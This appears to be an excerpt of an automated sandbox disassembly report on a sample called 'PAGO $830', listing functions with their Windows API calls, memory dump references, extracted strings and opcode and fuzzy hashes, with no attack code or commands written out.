                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                          • String ID: 0$F
                                                          • API String ID: 161812096-3044882817
                                                          • Opcode ID: 16099ad8eef4707d4282d8fd45147afc83e002344eee5157960509c8031c5a17
                                                          • Instruction ID: ac582606ba2db470aedb938241d37360a0703064186736992601b4ed4335dc28
                                                          • Opcode Fuzzy Hash: 16099ad8eef4707d4282d8fd45147afc83e002344eee5157960509c8031c5a17
                                                          • Instruction Fuzzy Hash: 2E416C78601209AFEF14CF65D884EAABBB9FF49314F140129F945B7390D731AA54CF60
                                                          Function 00E03956 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E039D0
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E039D3
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E039FA
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E03A1D
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E03A95
                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E03ADF
                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E03AFA
                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E03B15
                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E03B29
                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E03B46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow
                                                          • String ID:
                                                          • API String ID: 312131281-0
                                                          • Opcode ID: 44876a94f0040a0c035b071c0b5fb17f9fcdf523beed71082f956367b72d35d7
                                                          • Instruction ID: 0a597090f7f02e0c1fc5a21fa20a5d6ea191e471a15d090bf1f53c71b1b0da00
                                                          • Opcode Fuzzy Hash: 44876a94f0040a0c035b071c0b5fb17f9fcdf523beed71082f956367b72d35d7
                                                          • Instruction Fuzzy Hash: E3614975900248AFDB20DFA8CC81EEE77B8EB49714F100199FA15A72E1D771AE85DF50
                                                          Function 00DDB04D Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DDB06F
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB083
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00DDB08A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB099
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DDB0AB
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB0C4
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB0D6
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB11B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB130
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB13B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: cd795e6466241c2ad7dcf09ca293a29ab491b3e3aec7dd6596e193d0033c03ed
                                                          • Instruction ID: 5d6a3e495f4a4d1e28429b870db73cf215656ede4888ce80f12967c920a42125
                                                          • Opcode Fuzzy Hash: cd795e6466241c2ad7dcf09ca293a29ab491b3e3aec7dd6596e193d0033c03ed
                                                          • Instruction Fuzzy Hash: E431DF75600301EFDB20DF26DC54B6A37B8AB06765FA6410BFA01F6390D3B69C898B74
                                                          Function 00DA2C10 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00DA2C24
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DA2C30
                                                          • _free.LIBCMT ref: 00DA2C3B
                                                          • _free.LIBCMT ref: 00DA2C46
                                                          • _free.LIBCMT ref: 00DA2C51
                                                          • _free.LIBCMT ref: 00DA2C5C
                                                          • _free.LIBCMT ref: 00DA2C67
                                                          • _free.LIBCMT ref: 00DA2C72
                                                          • _free.LIBCMT ref: 00DA2C7D
                                                          • _free.LIBCMT ref: 00DA2C8B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c769fd2f407ea7d71d2337645a3ed6abcb72dc958cc9b0d6afe07830be74fa93
                                                          • Instruction ID: 2866da13c6d391d1695bfa54755068ebba7fc4c3312ce5c334e089e570444b1b
                                                          • Opcode Fuzzy Hash: c769fd2f407ea7d71d2337645a3ed6abcb72dc958cc9b0d6afe07830be74fa93
                                                          • Instruction Fuzzy Hash: AD11D476240149BFCB01EF5AC852CEE3BA5FF06750F4140A1BA589B222DA31DA959FA1
                                                          Function 00D72D1B Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D72D64
                                                          • OleUninitialize.OLE32(?,00000000), ref: 00D72E03
                                                          • UnregisterHotKey.USER32(?), ref: 00D72FE8
                                                          • DestroyWindow.USER32(?), ref: 00DB3045
                                                          • FreeLibrary.KERNEL32(?), ref: 00DB30AA
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB30D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: fe8edd0023ec4cf80989a5c5a70b213de0ccdb4cebdfcc7be38186b09187a008
                                                          • Instruction ID: 41e25f00f2d589021c6dd1a0c29566752418d00dc49d2d31fe6d1b2d0397d317
                                                          • Opcode Fuzzy Hash: fe8edd0023ec4cf80989a5c5a70b213de0ccdb4cebdfcc7be38186b09187a008
                                                          • Instruction Fuzzy Hash: 1AD14931701212CFCB29EF19C495A69F7A4FF05700F1482ADE94A6B252EB31AD52DFB1
                                                          Function 00D7758A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00D7761A
                                                            • Part of subcall function 00D776AA: GetClientRect.USER32(?,?), ref: 00D776D0
                                                            • Part of subcall function 00D776AA: GetWindowRect.USER32(?,?), ref: 00D77711
                                                            • Part of subcall function 00D776AA: ScreenToClient.USER32(?,?), ref: 00D77739
                                                          • GetDC.USER32 ref: 00DB52A2
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DB52B5
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DB52C3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DB52D8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00DB52E0
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DB5371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: d6443fc197fbd2bfda30c5bd6dac6685ce7b13fc35614ca01de44df841a35848
                                                          • Instruction ID: 4ace32522a74ed3bb9218435d2121b82ccc9547f6098e70667dba882d8d59cb9
                                                          • Opcode Fuzzy Hash: d6443fc197fbd2bfda30c5bd6dac6685ce7b13fc35614ca01de44df841a35848
                                                          • Instruction Fuzzy Hash: 0E71AE30404605DFCF228F64D884AEE7BB5FF49350F284669E9966A3AAD771C881DF70
                                                          Function 00DD4419 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: 83790d33ea2467072b83eb486bb666abae9a294d23bd5addb566d44a216e7f04
                                                          • Instruction ID: d65be748fa009cd358ef9c642f7f83d2cdee485902f976dd564ffacdd8ddb824
                                                          • Opcode Fuzzy Hash: 83790d33ea2467072b83eb486bb666abae9a294d23bd5addb566d44a216e7f04
                                                          • Instruction Fuzzy Hash: 37512232B003228BCB248E69C98557B77E1BF95714B58462EE881A3780EB30DD49C7B0
                                                          Function 00DD469F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 397eec6abfd53254da327d4523fbfd5f5841493eed85e1bdd71a1802b3155e26
                                                          • Instruction ID: 2e382aca8b606ed2b79f609290a88ec6e986a36efe457ff67080e79221ca5269
                                                          • Opcode Fuzzy Hash: 397eec6abfd53254da327d4523fbfd5f5841493eed85e1bdd71a1802b3155e26
                                                          • Instruction Fuzzy Hash: 0441F032B043128B8B14CE69C8C586BB7E1FF95714BA8462FE885A7740EB30DD09C7B0
                                                          Function 00DD448E Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: c0a270b7a8aadf46db47b996b4da547bf7aab42177723642b4716645c7c70ac6
                                                          • Instruction ID: e4a617723d19062dc125ed7e5652b97e156ec87740f708e2727ed3648793c43c
                                                          • Opcode Fuzzy Hash: c0a270b7a8aadf46db47b996b4da547bf7aab42177723642b4716645c7c70ac6
                                                          • Instruction Fuzzy Hash: 93412532B003225B8B248E6DC98543B7791FF95714B68462EE481A7784EB30DD09D3B0
                                                          Function 00DD4671 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 4acb5a3a77cf73e1b01f4e643ebd699efccb43e3f9ef21acb5b6ea317c8b24fc
                                                          • Instruction ID: d2d69d2de9780ed5b9a05f259bf931e59d52560a13fe093ea0890102e25ad103
                                                          • Opcode Fuzzy Hash: 4acb5a3a77cf73e1b01f4e643ebd699efccb43e3f9ef21acb5b6ea317c8b24fc
                                                          • Instruction Fuzzy Hash: DB412332B043118B8B14CE69C88143B77A1FF95714BA8462FE885A7740EB30DD09C7B1
                                                          Function 00DE34BA Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE3502
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00DE3528
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-2391861430
                                                          • Opcode ID: 88ddb19413bcd7dc5389cab76c961f866953a1c577cd221b14fc4886217fa615
                                                          • Instruction ID: 7d289b80474a23693fd0feeb11966ededb74869c6147cf9d9ed7cdaa70ca4d15
                                                          • Opcode Fuzzy Hash: 88ddb19413bcd7dc5389cab76c961f866953a1c577cd221b14fc4886217fa615
                                                          • Instruction Fuzzy Hash: 2A515A32800249AACF14EFE1DC56EEEBB74EF14310F44816AF519721A2EB715A99DF70
                                                          Function 00DD46DC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: bbd93f671b620e36af3140a95f2c5aad0c58501dd2b589eead201225badf2827
                                                          • Instruction ID: bb6aea4474a63ca04e7c7f1a2428e61c87431abbb774fb3e28752d08ec01e4e6
                                                          • Opcode Fuzzy Hash: bbd93f671b620e36af3140a95f2c5aad0c58501dd2b589eead201225badf2827
                                                          • Instruction Fuzzy Hash: 57410132B043228B8B248E7DC98543B77E5BFA5714B58452EE882A7784EB30DD09C7B1
                                                          Function 00DD4646 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 7de25427576141075d27c79ef357ab4721be02adcc09ceea20c7fd404486a8e4
                                                          • Instruction ID: b06a4168580d37d590e8b50ea79b81ca674034274317c7c7a818b54e09a885a2
                                                          • Opcode Fuzzy Hash: 7de25427576141075d27c79ef357ab4721be02adcc09ceea20c7fd404486a8e4
                                                          • Instruction Fuzzy Hash: 7A410232B043229BCB248FADC58543BB7E1BF95714B68452EE885A7745EB30DD49C7B0
                                                          Function 00DEC171 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC190
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC1B8
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC1E8
                                                          • GetLastError.KERNEL32 ref: 00DEC240
                                                          • SetEvent.KERNEL32(?), ref: 00DEC254
                                                          • InternetCloseHandle.WININET(00000000), ref: 00DEC25F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 46a502c8b0c722d8026ba96ec943b8544c0c7823129415a85af2e8acdb42ac68
                                                          • Instruction ID: 76b6870ebc5666bb468521d0ca9b932ffabbeb0e7d4900b478a300bb4fe1bd1d
                                                          • Opcode Fuzzy Hash: 46a502c8b0c722d8026ba96ec943b8544c0c7823129415a85af2e8acdb42ac68
                                                          • Instruction Fuzzy Hash: E831C071110344AFD721AFA68C88ABB7BFCEB49740B14561EF546A2200D731ED4A8BB5
                                                          Function 00DD97B9 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB47E6,?,?,Bad directive syntax error,00E0D0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DD97DA
                                                          • LoadStringW.USER32(00000000,?,00DB47E6,?), ref: 00DD97E1
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DD98A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 858772685-4153970271
                                                          • Opcode ID: 1314fd2abaab4bd8c72560234d969d7aface4646d7690403b7ca4bcab674a529
